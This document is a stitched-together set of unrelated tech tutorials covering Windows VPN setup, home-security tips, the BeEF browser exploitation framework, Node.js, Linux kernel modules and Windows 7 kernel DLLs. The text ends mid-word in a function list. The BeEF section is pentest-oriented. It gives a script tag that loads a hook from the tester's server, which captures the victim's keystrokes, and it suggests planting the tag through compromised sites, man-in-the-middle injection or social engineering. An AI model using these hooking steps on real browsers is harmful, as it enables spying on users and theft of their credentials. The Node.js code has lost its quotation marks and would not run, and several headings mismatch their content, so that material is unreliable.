Setting up VPN server on Window 7

To connect to a VPN on Windows 7, press the Windows key and, type VPN, and press Enter.

Enter the address of your VPN provider in the Internet Address box. You can enter an address like vpn.example.com or a numerical IP address, depending on the server information your VPN provider gave you.

You should also enter a Destination name – this can be anything you like. It's only used to help you remember which VPN connection is which.

Enter your login credentials on the next screen. Use the username and password your VPN provider gave you.

Windows will connect you to the VPN you configured. If you checked the "Don't connect now" checkbox on the first screen, Windows will save the VPN connection so you can easily connect later.

Once connected, you can click the network icon in your system tray to view your VPN connections. While connected to a VPN, all your network traffic will be sent over it.

To disconnect from a VPN, click it and click Disconnect. You can then reconnect to it later by clicking it and selecting Connect. You can have multiple VPNs configured and switch between them in this way.

To delete a saved VPN connection, press the Windows key, type network connections, and press Enter. Right-click a VPN connection and use the Delete option.

Setting up VPN server on Windows 8

Windows has the built-in ability to function as VPN server, although this option is hidden. This trick works on both Windows 7 and Windows 8. The server uses the point-to-point tunneling protocol (PPTP.)

This could be useful for connecting to your home network on the road, playing LAN games with someone, or securing your web browsing on a public Wi-Fi connection – a few of the many reasons you might want to use a VPN.

Limitations

While this is a pretty interesting feature, it may not be the ideal way to allow VPN connections to your local network. It has some limitations:

You will need the ability to forward ports from your router.You have to expose Windows and a port for the PPTP VPN server directly to the Internet, which is not ideal from a security standpoint. You should use a strong password and consider using a port that isn't the default port.This isn't as easy to set up and use as software like LogMeIn Hamachi andTeamViewer. Most people will probably be better off with a more complete software package like those two.

Creating a VPN Server

First, you'll need to open the Network Connections window. The quickest way to open it is to press the Windows key, typencpa.cpl, and press Enter.

Press the Alt key, click the File menu that appears, and select New Incoming Connection.

You can now select the user accounts that can connect remotely. To increase security, you may want to create a new, limited user account rather than allow VPN logins from your primary user account. (Click Add someone to create a new user account.) Ensure the user you allow has a very strong password, as a weak password could be cracked by a dictionary attack.

Select the Through the Internet option to allow VPN connections over the Internet. You can also allow incoming connections over a dial-up modem, if you have the dial-up hardware.

You can then select the networking protocols that should be enabled for incoming connections. For example, if you don't want people connected to the VPN to have access to shared files and printers on your local network, you can uncheck the File and Printer Sharing option.

Click the Allow access button and Windows will set up a VPN server.

If you want to disable the VPN server in the future, you can delete the Incoming Connections item from your Network Connections window.

Router Setup

You will now need to log into your router's setup page and forward port 1723 to the IP address of the computer where you set up the VPN server. For more instructions, readHow to Forward Ports on Your Router.

For maximum security, you may want to create a port forwarding rule that forwards a random "external port" – such as 23243 – to "internal port" 1723 on your computer. This will allow you to connect to the VPN server using port 23243, and will protect you from malicious programs that scan and attempt to automatically connect to VPN servers running on the default port.

You can also consider using a router or firewall to only allow incoming connections from specific IP addresses.

To ensure you can always connect to the VPN server, you may want to set up a dynamic DNS service like DynDNS on your router.

Connecting to Your VPN Server

To connect to the VPN server, you will needyour computer's public IP address (its IP address on the Internet) or its dynamic DNS address, if you set up a dynamic DNS service above.

Use the Connect to a network option in Windows and enter your computer's public IP address. Provide the username and password you created to log in.

Defending against firewall attack

Hackers have thousands of tools at their disposal to take advantage of you including tools such as keystroke loggers. Keystroke loggers record every single keystroke you type on your computer...this includes your private email messages, your bank account password, and your credit card number! If you are connected to the Internet via a high-speed connection (DSL or cable), hackers can turn your computer into a "zombie" to launch attacks against thousands of other users and computers.

This article focuses on Microsoft Windows users since the majority of computer users today use a version of this operating system on their home and/or office computers. And while not as frequent targets of hackers, alternative operating systems such as Mac OS and Linux are also vulnerable to attack.

10 Steps you can take to protect yourself:

Update your computer - Stop using computers with insecure operating systems such as Microsoft Windows 95, Windows 98, and Windows ME. These versions of Microsoft Windows are now so old and outdated, they cannot be considered secure. Every day you use your computer may put you at risk. Upgrade your computer to Windows XP Service Pack 2 (or consider buying a new PC with it already installed). UPDATE 02/01/2007: Microsoft has now released a new operating system - Vista - which is designed to replace Windows XP and is supposed to be more secure.

Update Microsoft Windows - Even with the newest computer, there are updates to be applied. There have been significant security holes discovered in all versions of Windows so it's important to update your computer's operating system as soon as possible. Regardless of the version of Windows you use, visit the Microsoft's Windows Update website (http://windowsupdate.microsoft.com) and install all "critical patches." You should also consider installing the recommended and driver patches. Note: It's always a good idea to backup your important data before installing updates (see Step #9). Keep in mind that even with Windows XP, there may be more than 80 patches that need to be installed...although the process is fairly automated, downloading the patches could take many hours on a dial-up Internet account. You may not be able to install patches for Windows on your work computer (requires administrator priviledges) but you should ask your network administrator about their plans to keep your work computer up-to-date.

Use antivirus software - No one should be without antivirus software on their computer. There are many commercial products that can help protect your computer from various viruses, worms, trojans and other hacker tools. But antivirus software works based on known viruses...the software must be configured to update its database of what to look for...be sure to configure your anti-virus software to update itself at least daily. And plan to run a complete system check of your computer's hard disks at least once per month to make sure nothing slipped in between antivirus software updates.

Antivirus Software

http://free.grisoft.com (AVG Antivirus Free)http://www.symantec.com/nav/nav_9xnt/ (Norton Antivirus)http://www.sophos.com/products/sav/ (Sophos Antivirus)http://www.pandasoftware.com/home/default.asp (Titanium Antivirus)http://www.trendmicro.com/en/home/us/personal.htm (Trend Micro PC-cillin)http://www.mcafee.com (McAfee VirusScan)

Online Antivirus Checkups

http://housecall.trendmicro.com/http://www.pandasoftware.com/products/activescan.htm

Block Spyware - spyware and viruses often go hand-in-hand but can take many forms. Some 'hijack' your web browser and redirects you to their website. Others quietly download and install trojans, keylogger programs, etc. to your computer so hackers can take control of your computer later. Install and run an anti-spyware program such as:http://www.safer-networking.org/en/download/index.html (Spybot Search & Destroy)http://www.webroot.com/consumer/products/spysweeper/ (Spy Sweeper)http://www.lavasoft.com/products/ad-aware_se_personal.php (Ad-aware SE Personal)

Keep your software up-to-date

Microsoft Office: Many computer users use a version of the popular Microsoft Office suite (Outlook, Word, Excel, Powerpoint, or Publisher). Microsoft has released many patches for the Microsoft Office suite including some for "critical" security issues as well as "stability and performance enhancements." Note that you may need your original Microsoft Office installation CD to complete the updates.

http://office.microsoft.com/officeupdate/default.aspx (Microsoft Office)

Adobe Reader: Acrobat PDF files are used extensively on the SDMS website and throughout the Internet. Adobe Reader 8 can be used to view/print these files. You should not be using older versions - a free upgrade is available.

http://www.adobe.com/products/acrobat/readstep2.html (Acrobat Reader)

Flash: Adobe Flash Player is used on many website, including the ARDMS, to provide a more interactive web experience. Serious security issues have been found in older versions of the Flash viewer.

http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash (Adobe Flash Player)

Use a firewall - A firewall simply tries to block hackers from entering or using your computer. If you are using cable or DSL connections to the Internet, a hacker can attempt to break-in to your computer 24x7! Make sure you have a router/firewall properly installed and configured. The most common mistake home users make is buying a router/firewall but never resetting the default password...it's like leaving the keys in the door! You can also use a software-based firewall to protect your computer from hackers. Microsoft's scheduled release of its Service Pack #2 for Windows XP in August will include a simple software-based firewall designed to better protect your computer. Some software-based firewalls include:

http://www.zonealarm.com (ZoneAlarm)http://www.mcafee.com (McAfee Personal Firewall)http://www.symantec.com/sabu/nis/npf/ (Norton Personal Firewall)

Use complex passwords - whether at work or at home, use complex passwords (and never write them down!). Using a password longer than 8 characters can greatly reduce the chance that someone will guess your password. Hackers don't usually sit there and try to guess your password one at a time. They use automated brute force tools that can break a simple password in a few minutes to a few hours. Here's an example of a complex password: 1mSdM5m3MbEr (Hint: I am SDMS member)

You should change your password at least every 3 months and never reuse old passwords...be creative, come up with something new!

Tip: Never use the same (or similar) password at home and work...if one is compromised, then both are compromised...

Tips for Creating Secure Passwords

http://www.microsoft.com/athome/security/privacy/password.mspxhttp://www.us-cert.gov/cas/tips/ST04-002.htmlhttp://www.symantec.com/homecomputing/library/pass_w.html

Use "Personal Biometric Devices" - If you use the Internet for online banking, purchases, etc., remembering all your passwords can be difficult. Personal biometric devices that use fingerprints are great tools to assist you in protecting your computer and easily storing your passwords ($50 to $150).

http://www.apc.com/resource/include/techspec_index.cfm?base_sku=BIOPOD(APC's Personal Biometric USB Pod)http://www.digitalpersona.com/products/personal.html (Digital Persona's U.Are.U Personal)http://www.microsoft.com/hardware/mouseandkeyboard/productdetails.aspx?pid=093 (Microsoft Fingerprint Reader)

Backup your important data often - Diskettes are no longer practical for backup - a CD recordable (CD-R) drive can help quickly backup your important data (700 MB per disc or equivalent to 485 diskettes). DVD recordable drives are also available (~7 times as much as a CD or equivalent to 3200 diskettes!) Other options include external USB hard drives to store all of your "data", documents, photos, music as well as USB "thumb" drives that you can carry on your keychain.

Enlist the support of experts - all this can be scary...hackers and even unexpected problems with security patches could potentially mess up your system rendering it unusable! And it's time consuming...with over 80 patches to Windows XP, the download and installations can take hours. Don't be afraid to enlist the assistance of experts. Check with your local computer or electronics store. There are many companies that specialize in providing home user support such as Geeks on Call:http://www.geeksoncall.com/resserv.htm

The Browser Exploitation Framework on Linux Kali

BeEF, the Browser Exploitation Framework, is a testing tool designed to enable penetration testers to launch client-side attacks against target browsers. By using techniques similar to common drive-by malware, testers can assess the security of a target's internal environment, bypassing the hardened perimeter.

In this post, I'll show you the quickest way to get up and running with BeEF using BackTrack or Kali Linux. Then we'll explore the basic structure of the program. By the end of the post you should be able to begin using BeEF in your own testing.

In this guide I'll be using Kali Linux, the penetration testing distribution created by the folks at Offensive Security. You can download an ISO or a VMWare image atwww.kali.org. The steps will also work for BackTrack, the previous incarnation of the distribution. For installation steps on other systems, check out the BeEF Wiki.

Installation on Kali is very simple. Since they've created a nice package we can simply use apt-get to install it. Just to make sure we've got the most recent version, we'll update our package list first.

root@kali:/# apt-get update
root@kali:/# apt-get install beef-xss

(Be sure you get beef-xss and not beef. The latter is a programming language interpreter.)

Since we're depending on a package from the Kali maintainers, this method may not always get the most up-to-date version of BeEF. At the time of this post the package provides version 0.4.4.5 which is the most recent release. If you need a feature that isn't yet available in the Kali package then you'll need to follow the directions on the BeEF website to download & install it manually.

Once the install is finished, we can change to its directory and launch BeEF:

root@kali:/# cd /usr/share/beef-xss
root@kali:/# ./beef

You should see the following:

This screen tells us that BeEF is running on two different interfaces, locally and internally, both on port 3000. It also provides the link for the "hook" and the user interface control panel. All of these settings and more are customizable via the "config.yaml" file found in the program's root directory.

Now that BeEF is up and running, let's check out the control panel.  Using a web browser we'll browse to the link listed above. In my case it's http://192.168.1.101:3000/ui/panel. You should be able to access this link from any machine on the same local network, but if you have a host-based firewall turned on you may need to open the appropriate ports to access it. The user name and password are beef:beef.

Once logged in we're greeted with a helpful Getting Started page that explains some of the additional options. But the most important point is in the first paragraph. Here we learn how to "hook" a browser. BeEF provides two example pages in order to test with.

The BeEF hook is a JavaScript file hosted on the BeEF server that needs to run on client browsers. When it does, it calls back to the BeEF server communicating a lot of information about the target. It also allows additional commands and modules to be ran against the target.  In this example, the location of my BeEF hook is at http://192.168.1.101:3000/hook.js.

In order to attack a browser, we need to include our JavaScript hook in a page that the client will view. There are a number of ways to do that, but the easiest is to insert the following into a page and somehow get the client to open it.

<script src="http://192.168.1.101:3000/hook.js" type="text/javascript"></script>

In a real-world test, you could insert this link in a page via a compromised web server, inject it into traffic after a successful man-in-the-middle attack, or use social engineering techniques such as phone calls, emails, or social network links to get the target to visit the page.

For this demonstration, click the link beside "basic demo page here." Once that page loads, go back to the BeEF Control Panel and click on "Online Browsers" on the top left. After a few seconds you should see your IP address pop-up representing a hooked browser. Hovering over the IP will quickly provide information such as the browser version, operating system, and what plugins are installed.

When you click on any machine on the left, you'll see a lot more details and functionality. The screenshot below shows the Logs tab on the right. We can see that I typed "secret password" into the text box on the demo page. Notice that I didn't submit the page, I just typed it in.

As an experiment, try clicking anywhere else on the demo page except for in the text box. Now type something like "abcdef." Now go back to the BeEF Control Panel and click the Refresh button at the bottom of the Logs tab. You should notice a new event similar to this:

Now click on the Commands tab. You'll find a wide range of commands and exploits that can be launched against your target. Try them out, but be patient; sometimes it takes awhile for commands to finish and report their results. The more you experiment with each command, the more you'll know how reliable it is and how best to use it. In addition to the exploits listed, BeEF can also be integrated with Metasploit in order to launch a wider range of exploits against the host system. That'll be another blog post.

Notice that some of the commands have different colored icons. If you click back to the Getting Started tab, there's an explanation of what each of the colors represent.

Now that you're up and running there's a lot more that you can do with BeEF. Experiment with the different options in your lab so that you'll be ready to go when the opportunity presents itself during an engagement.

Creating application using Node.js

JavaScript has been a popular language for Web development, but it was restricted to the browser. Node.js takes a step beyond and uses JavaScript for shell scripting, server side scripting and more. This article gets you started with the Node development environment.

Node.js allows developers to build applications using their favourite JavaScript language. Though there is extensive add-on software built on Node for Web development, it is not restricted. You can also develop command line utilities, standalone applications and server-based software using Node.

Node consists of two main components – the JavaScript engine and the Web server. The JavaScript engine is a high performance, finely tuned Google V8 engine. A Web server embedded in Node makes it attractive for developing applications for HTTP clients such as browsers.

Node takes JavaScript to a new dimension by adding the file system access functionality. Such functionality was not available in JavaScript, as it was restricted to running in the browser sandbox.

Installing Node
Node.js is available as pre-compiled binaries on all popular platforms such as Windows, Mac, and Linux. Installation on the respective platforms is simple with a wizard style installer.

On Mac and Linux operating systems,Node.js gets installed in the /usr/local/bin directory.
To check the installation, run the following command:

$ node --version

$ node

>

Command line Node
Node allows evaluation of JavaScript expressions and code at the prompt. This feature is very handy if you are learning the basics of JavaScript.

$ node

a = 10

10

> console.log("Value of a = "+a)

Value of a = 10

undefined

>     (Ctrl+C twice or ".exit" to quit prompt)

The command line parser is a REPL (Read Eval Print Loop). The few commands given in Table 1 help while trying Node REPL.

Node Package Manager
Node packages are modular libraries that help in specific functionalities. For example, file system management such as listing files in a directory and reading files is provided by the 'fs' package. This makes Node programming easy where you can pick and reuse the existing code snippet in your code, rather than coding from scratch. For example, to write a robust Web application that takes an input, processes it and gets back output to the browser, could take around 100 lines of code. But with existing packages, you could do it in a few lines.

Node Package Manager (npm) allows users to install, update and uninstall packages to the Node environment. The best part is that the installation and use of packages is very simple. If you can think of new functionality, it is very easy to create and add a new package. Currently, there are 40,000+ packages for Node in the repository!
To install a new package you can use:

$ npm install <package-name>     //to install a package and                                            //dependent packages

$ npm ls                         //to list all the installed                                           //and dependent packages

Node Package Manager maintains the packages and dependencies learnt from a JSON file. When you install a package, the dependent packages are picked automatically for installation.

For a list of all packages that can be installed from the npm registry, visit:https://npmjs.org

Writing command line utilities using Node

Node can be used to write shell scripts using JavaScript. If you are a Web programmer with JavaScript experience, you need not learn any other shell scripting. Given below is the procedure to make a Javascript file execute like shell script from the command prompt.

The shell script below is written to watch for any changes in a file. Whenever the watched file content is changed or modified, the user gets a line printed with the size and time of modification.

1 #!/usr/bin/env node

2

3 var filename = ;

4 if (process.argv.length == 2)

5 {  6     console.log(Syntax: ./watch-file.js <filename>);

7     return 1;

8 }

9 else

10 {

11     filename = process.argv[2];

12     console.log(Filename being watched: + filename);

13 }

14

15 var fs = require(fs);

16

17 fs.watchFile(filename, function (curr, prev) {

18     console.log(filename + : (size: + curr.size+ ) + curr.mtime);

19 });

Here's an explanation of the script given above.
Line 1: Instruction to use the Node environment to execute the script.
Line 3 – 13: Accept the file to watch as command line argument. If the file name is not sent as a command line parameter, print the syntax. If the file name is entered, print <name of the file>is being watched for modifications.
Line 15: Use the Node file system library.
Line 17: watchFile is a file system method. The first parameter is the file name. The second parameter is the callback function, which gets called whenever the watched file is touched or edited.
Line 18: Print the file name, size and time modified.
To execute the script at the command prompt, change the file permissions and type the file name:

$ chmod +x watch-file.js

$ ./watch-file.js

Syntax: ./watch-file.js <filename>

$ ./watch-file.js watch.txt

Filename being watched: watch.txt

In another terminal (2), either 'touch watch.txt' or edit the watch.txt file. After completing the operation, a line gets displayed like the one below at the terminal (1).

watch.txt: (size:0) Tue Sep 17 2013 20:01:03 GMT+0630 (India Standard Time)

JavaScript is known for its string manipulation and extensive parsing capabilities. The special features of this language, like event driven programming, anonymous functions and closures, make shell programming a lot more fun.

A Web application with JavaScript on the server side

There were many popular scripting languages that were the de facto choice at different periods of time. Perl has excellent capabilities for text manipulation and is well suited for CGI scripting. Python and PHP were later preferred for their object oriented nature and embedded scripting into HTML files. So, for complete Web development, a programmer needed another scripting language exclusively for the server side.

Now with Node, that necessity is removed and the Web developer can just do complete application development using JavaScript.
Let's now develop a Web application that generates a quiz questionnaire, reading from a text file as input. The input is a text file where the quiz master can type the quiz questions and multiple choice answers.
Given below is a sample of the input file with the title in the first line and with two records:

1 JavaScript quiz
2 Which of the following words are not reserved words in JavaScript?::break:delete:alpha:false
3 Which of the following are valid data types in JavaScript?::Boolean:float:String:Number

Here the questions and answers are separated by '::' and multiple choice answers are separated by ':'.
Given below is the complete code for  the JavaScript quiz.:

1 var http = require('http');

2 var fs = require('fs');

3 var question = ;

4 var options_array = ;

5 var quiz_heading = ;

6 var data_lines = {};

7

8 fs.readFile(./questions.txt,'utf8',

function (err, data) {

9     if (err) { return console.log(err); }

10     else

11     {

12         data_lines = data.split('\n');

13     }

14   });

15

16

17 var server = http.createServer(function(req, res) {

18     res.writeHead(200, {Content-Type: text/html});

19     res.write(<html><head><title>+ quiz_heading

+ </title></head>);

20     res.write(<body>);

21

22     //Extract QUIZ heading, which is the first line

23     quiz_heading = data_lines[0];

24     res.write(<h1 align=center>+quiz_heading+</h1>);

25

26     res.write(<form>);

27     for (var i=1; i < data_lines.length; i++)

28     {

29         if (data_lines[i].length > 1)

30         {

31             var q_and_a = data_lines[i].split(::);

32             question = q_and_a[0];

33             options_array = q_and_a[1].split(:);

34

35             res.write(<h4>+ i +   + question+</h4>);

36             for (j = 0; j < options_array.length; j++)

37             {

38                 res.write(<input type=checkbox>

+ options_array[j]+</br>);

39             }

40         }

41     }

42     res.write(</br></br><input type=submit

value=Evaluate>);

43     res.write(</form></body></html>);

44     res.end();

45 });

46 server.listen(8000);

47 console.log(Connect to http://localhost:8000);

Here's the explanation of the above script.

Line 1: Include the file system and http libraries, which will be used later.
Line 3-6: Variables declaration. data_lines is an array to store records from file.
Line 8-14: Read the file and separate each line as a record. Split function makes an array with each line as one element in an array. Line 1 of the input file is the array element with index 0.

Line 17-20: Create a server instance. Write the HTTP header to the browser when a new request comes.
Line 22-24: Write the head of the HTML file based on the first line of the input file.
Line 26-45: Parse Line 2 to the end of the file and split the questions and answers. Prepare the HTML form elements using a checkbox for each answer option.
Line 46: Listen to port 8000. If browser and server are on the same machine, open http://localhost:8000/ in your Web browser.
Line 47: Details of the URL where the server can be reached.
Now run the program using the command below:

$ node node-quiz.js

Connect to http://localhost:8000

The output can be seen in Figure 1.

Enhancing the Web application

The above application only displays a quiz questionnaire. But the same can be enhanced for processing the number of right answers and evaluating the scores. To develop a full production grade Web application,Node.js popular package Express can be used.

Linux kernel programming module

Here's an introduction to the Linux kernel module, along with an explanation on how to write a simple pluggable module to the Linux kernel and load the module into the existing kernel.

The kernel is the core of any operating system and is responsible for managing system resources. Broadly, the Linux kernel can be of two types.
Monolithic kernels: This is a single executable file in which all the modules are part of the kernel. In order to add anything to the existing kernel, developers have to rebuild the complete kernel and add the new functions.
Modular kernels: Modular kernels provide developers an option to add new functionality to the existing kernel by plugging the new code, also known as 'modules' at run time.
In this article, let's explore how to write a simple pluggable kernel module for the Linux kernel.

What are kernel modules?
Kernel modules are pieces of code, which can be loaded and unloaded from a kernel, on demand. A Linux Kernel Module (LKM) can be added at run time without even requiring a reboot or even a rebuild of the running kernel. The LKM will have a .koextension.

The LKM will act as the interface between a user space application and the Linux kernel. Any request to access the hardware from an application goes via the LKM to the kernel, and then to the actual hardware (see Figure 1).
To know the list of modules running in a Linux kernel you can use the 'lsmod' command, which actually gives the list of running modules at that point of time, by reading '/proc/modules' as shown in Figure 2.
Kernel modules can be broadly categorised as character, block or network modules.

Kernel module management commands
insmod <module-name>: This command is to insert the new module into the kernel
lsmod: This lists the modules that are currently loaded in the kernel
modinfo <module-name>: This is to get complete information about the module
rmmod <module-name>: This command is to remove the module from the kernel
modprobe <module-name>: This works the same as insmod but it uses 'Module Stacking' to load any module that is required to load the current module.
modprobe r <module>: To remove the module from the kernel
dmesg: Shows the contents of the kernel ring buffer
For an example of how to use module management commands, please refer to Figure 3.

Writing a simple module
Let's write a simple kernel module and see how easy and interesting it is. Refer to Figure 5, where the simple module is written.

Now let's understand the concepts we used to write the above module.
hello_init(): This is called when the module is inserted into the kernel using insmod. This function gets invoked by the 'module_init' macro. The init function is responsible for registering the module with the kernel.
hello_exit(): This function is called when the module is removed from the kernel using rmmod. This function gets invoked by the 'module_exit' macro. This function removes and cleans up the inserted module.
Macros module_init (hello_init) & Module_init (hello_exit): Using these macros, programmers can give user defined names to the init and cleanup functions. These macros are defined in <linux/init.h>.
Printk: In kernel module programming, 'printk' is used to print kernel messages in to the kernel logs. Printk messages are linked to the priority associated with them. For all behavioural purposes, we use 'printk' in kernel module programming much as we use 'printf' in user level C programs.

Compiling and building the module
Use a makefile to compile and build the sample helloworld module. Refer the Figure 5, where the makefile for this module is written.
Use the 'make' command to compile and build the helloworld kernel module program. The 'make' command console output screenshot is shown in Figure 6.

Once the module is compiled and built using make, the 'module.ko (helloworld.ko)' will be created.

Insert and remove the sample helloworld kernel module
Now that we have the helloworld.ko file, insert this module into or remove it from the kernel by using the insmod/rmmod commands. Please refer the Figure 7 for this.

Passing run time arguments to the module
As with any other program, run time arguments can be passed to the kernel module also, as follows:

module_param (str, int, S_IRUGO) macro is used

str  name of the variable

int  type of the variable

S_IRUGO  permission flag

Figure 8 shows the sample output of passing runtime arguments for thehelloworld kernel module.

References
The Linux Kernel Module Programming Guide:http://www.tldp.org/LDP/lkmpg/2.6/lkmpg.pdf

Windows 7 Kernel Architecture

  Windows 7 Kernel Architecture Changes - api-ms-win-core files

Windows 7 introduces a new set of dll files containing exported functions of many well-known WIN32 APIs. All these filenames begins with 'api-ms-win-core' prefix, followed by the functions category name.
For example, api-ms-win-core-localregistry-l1-1-0.dll contains the exported names for all Registry functions, api-ms-win-core-file-l1-1-0.dll contains the exported names for all file-related functions, api-ms-win-core-localization-l1-1-0.dll contains the exported names for all localization functions, and so on.

If you look deeply into these files, you'll see that all these files are very small, and the functions in them doen't do anything, and simply returns a 'TRUE' value. Just for example, here's the assembly language content of RegDeleteValueW function in api-ms-win-core-localregistry-l1-1-0.dll:

084010CE 33C0 xor eax, eax 084010D0 40 inc eax 084010D1 C20800 ret 0008 By looking in dependency walker utility, we can see that advapi32.dll, kernel32.dll, and other system dll files, are now statically linked to these empty api-ms-win-core files.

Moreover, if we look in the assembly language output of many API functions, we can see that they simply call their corresponding function in one of these api-ms-win-core Dlls. Just for example, RegDeleteValueW in advapi32.dll, simply contains a jump to the RegDeleteValueW in API-MS-Win-Core-LocalRegistry-L1-1-0.dll:

ADVAPI32!RegDeleteValueW: 77C6F301 8BFF mov edi, edi 77C6F303 55 push ebp 77C6F304 8BEC mov ebp, esp 77C6F306 5D pop ebp 77C6F307 EB05 jmp 77C6F30E . . . 77C6F30E FF25B414C677 Jmp dword ptr [77C614B4] <-- [77C614B4] Points the import entry of API-MS-Win-Core-LocalRegistry-L1-1-0.RegDeleteValueW So if RegDeleteValueW in ADVAPI32 and other functions simply jumps to empty functions, how is it possible that these functions still works properly ?

The answer is pretty simple: When Windows loads the dll files, all the import entries of these api-ms-win-core Dlls are replaced with a call to a real function in Windows kernel.
So here's our RegDeleteValueW example again: when loading a program into WinDbg, we can see that the jmp call now points to kernel32!RegDeleteValueW function. That's because during the loading of advapi32.dll, Windows automatically replace the import entry of API-MS-Win-Core-LocalRegistry-L1-1-0.RegDeleteValueW to the function address of RegDeleteValueW in kernel32.

75e5f301 8bff mov edi,edi 75e5f303 55 push ebp 75e5f304 8bec mov ebp,esp 75e5f306 5d pop ebp 75e5f307 eb05 jmp ADVAPI32!RegDeleteValueW+0xd (75e5f30e) . . . 75e5f30e ff25b414e575 jmp dword ptr [ADVAPI32+0x14b4 (75e514b4)] ds:0023:75e514b4= {kernel32!RegDeleteValueW (758bd5af)}

Another new dll: kernelbase.dll

In addition to the new API-MS-Win-Core dll files, there is also another new dll: kernelbase.dll
In previous versions of Windows, most of the kernel32 functions called to their corresponding functions in ntdll.dll.
In Windows 7, most of the kernel functions call to their corresponding functions in kernelbase.dll, and the kernelbase dll is the one that makes the calls to ntdll.dll

Effects on existing applications - compatibility issues.

Most of the existing applications should not be affected by this kernel change, because all standard API calls still works the same as in previous versions of Windows.
However, there are some diagnostic/debugging applications that rely on the calls chain inside the Windows kernel. These kind of applications may not work properly in Windows 7.
My own utilities, RegFromApp and ProcessActivityView failed to work under Windows 7 because of these changes, and that what led me to discover the kernel changes of Windows 7. These utilities problems already fixed and now they works properly in Windows 7.

API-MS-Win-Core List

Finally, here's the list of all core dll files added to Windows 7 and the functions list that each one of them contain. I used my own DLL Export Viewer utility to generate the list.

DLL FileFunction Namesapi-ms-win-core-console-l1-1-0.dllAllocConsoleGetConsoleCPGetConsoleModeGetConsoleOutputCPGetNumberOfConsoleInputEventsPeekConsoleInputAReadConsoleAReadConsoleInputAReadConsoleInputWReadConsoleWSetConsoleCtrlHandlerSetConsoleModeWriteConsoleAWriteConsoleWapi-ms-win-core-datetime-l1-1-0.dllGetDateFormatAGetDateFormatWGetTimeFormatAGetTimeFormatWapi-ms-win-core-debug-l1-1-0.dllDebugBreakIsDebuggerPresentOutputDebugStringAOutputDebugStringWapi-ms-win-core-delayload-l1-1-0.dllDelayLoadFailureHookapi-ms-win-core-errorhandling-l1-1-0.dllGetErrorModeGetLastErrorRaiseExceptionSetErrorModeSetLastErrorSetUnhandledExceptionFilterUnhandledExceptionFilterapi-ms-win-core-fibers-l1-1-0.dllFlsAllocFlsFreeFlsGetValueFlsSetValueapi-ms-win-core-file-l1-1-0.dllCompareFileTimeCreateDirectoryACreateDirectoryWCreateFileACreateFileWDefineDosDeviceWDeleteFileADeleteFileWDeleteVolumeMountPointWFileTimeToLocalFileTimeFileTimeToSystemTimeFindCloseFindCloseChangeNotificationFindFirstChangeNotificationAFindFirstChangeNotificationWFindFirstFileAFindFirstFileExAFindFirstFileExWFindFirstFileWFindFirstVolumeWFindNextChangeNotificationFindNextFileAFindNextFileWFindNextVolumeWFindVolumeCloseFlushFileBuffersGetDiskFreeSpaceAGetDiskFreeSpaceExAGetDiskFreeSpaceExWGetDiskFreeSpaceWGetDriveTypeAGetDriveTypeWGetFileAttributesAGetFileAttributesExAGetFileAttributesExWGetFileAttributesWGetFileInformationByHandleGetFileSizeGetFileSizeExGetFileTimeGetFileTypeGetFinalPathNameByHandleAGetFinalPathNameByHandleWGetFullPathNameAGetFullPathNameWGetLogicalDrivesGetLogicalDriveStringsWGetLongPathNameAGetLongPathNameWGetShortPathNameWGetTempFileNameWGetVolumeInformationByHandleWGetVolumeInformationWGetVolumePathNameWLocalFileTimeToFileTimeLockFileLockFileExQueryDosDeviceWReadFileReadFileExReadFileScatterRemoveDirectoryARemoveDirectoryWSetEndOfFileSetFileAttributesASetFileAttributesWSetFileInformationByHandleSetFilePointerSetFilePointerExSetFileTimeSetFileValidDataUnlockFileUnlockFileExWriteFileWriteFileExWriteFileGatherapi-ms-win-core-handle-l1-1-0.dllCloseHandleDuplicateHandleGetHandleInformationSetHandleInformationapi-ms-win-core-heap-l1-1-0.dllGetProcessHeapGetProcessHeapsHeapAllocHeapCompactHeapCreateHeapDestroyHeapFreeHeapLockHeapQueryInformationHeapReAllocHeapSetInformationHeapSizeHeapSummaryHeapUnlockHeapValidateHeapWalkapi-ms-win-core-interlocked-l1-1-0.dllInitializeSListHeadInterlockedCompareExchangeInterlockedCompareExchange64InterlockedDecrementInterlockedExchangeInterlockedExchangeAddInterlockedFlushSListInterlockedIncrementInterlockedPopEntrySListInterlockedPushEntrySListInterlockedPushListSListQueryDepthSListapi-ms-win-core-io-l1-1-0.dllCancelIoExCreateIoCompletionPortDeviceIoControlGetOverlappedResultGetQueuedCompletionStatusGetQueuedCompletionStatusExPostQueuedCompletionStatusapi-ms-win-core-libraryloader-l1-1-0.dllDisableThreadLibraryCallsFindResourceExWFindStringOrdinalFreeLibraryFreeLibraryAndExitThreadFreeResourceGetModuleFileNameAGetModuleFileNameWGetModuleHandleAGetModuleHandleExAGetModuleHandleExWGetModuleHandleWGetProcAddressLoadLibraryExALoadLibraryExWLoadResourceLoadStringALoadStringWLockResourceSizeofResourceapi-ms-win-core-localization-l1-1-0.dllConvertDefaultLocaleFindNLSStringFindNLSStringExGetACPGetCalendarInfoExGetCalendarInfoWGetCPFileNameFromRegistryGetCPInfoGetCPInfoExWGetFileMUIInfoGetFileMUIPathGetLocaleInfoExGetLocaleInfoWGetNLSVersionGetNLSVersionExGetOEMCPGetProcessPreferredUILanguagesGetSystemDefaultLangIDGetSystemDefaultLCIDGetSystemPreferredUILanguagesGetThreadLocaleGetThreadPreferredUILanguagesGetThreadUILanguageGetUILanguageInfoGetUserDefaultLangIDGetUserDefaultLCIDGetUserPreferredUILanguagesIsNLSDefinedStringIsValidCodePageIsValidLanguageGroupIsValidLocaleIsValidLocaleNameLCMapStringExLCMapStringWLocaleNameToLCIDNlsCheckPolicyNlsEventDataDescCreateNlsGetCacheUpdateCountNlsUpdateLocaleNlsUpdateSystemLocaleNlsWriteEtwEventResolveLocaleNameSetCalendarInfoWSetLocaleInfoWSetThreadLocaleVerLanguageNameAVerLanguageNameWapi-ms-win-core-localregistry-l1-1-0.dllRegCloseKeyRegCreateKeyExARegCreateKeyExWRegDeleteKeyExARegDeleteKeyExWRegDeleteTreeARegDeleteTreeWRegDeleteValueARegDeleteValueWRegDisablePredefinedCacheExRegEnumKeyExARegEnumKeyExWRegEnumValueARegEnumValueWRegFlushKeyRegGetKeySecurityRegGetValueARegGetValueWRegLoadKeyARegLoadKeyWRegLoadMUIStringARegLoadMUIStringWRegNotifyChangeKeyValueRegOpenCurrentUserRegOpenKeyExARegOpenKeyExWRegOpenUserClassesRootRegQueryInfoKeyARegQueryInfoKeyWRegQueryValueExARegQueryValueExWRegRestoreKeyARegRestoreKeyWRegSaveKeyExARegSaveKeyExWReg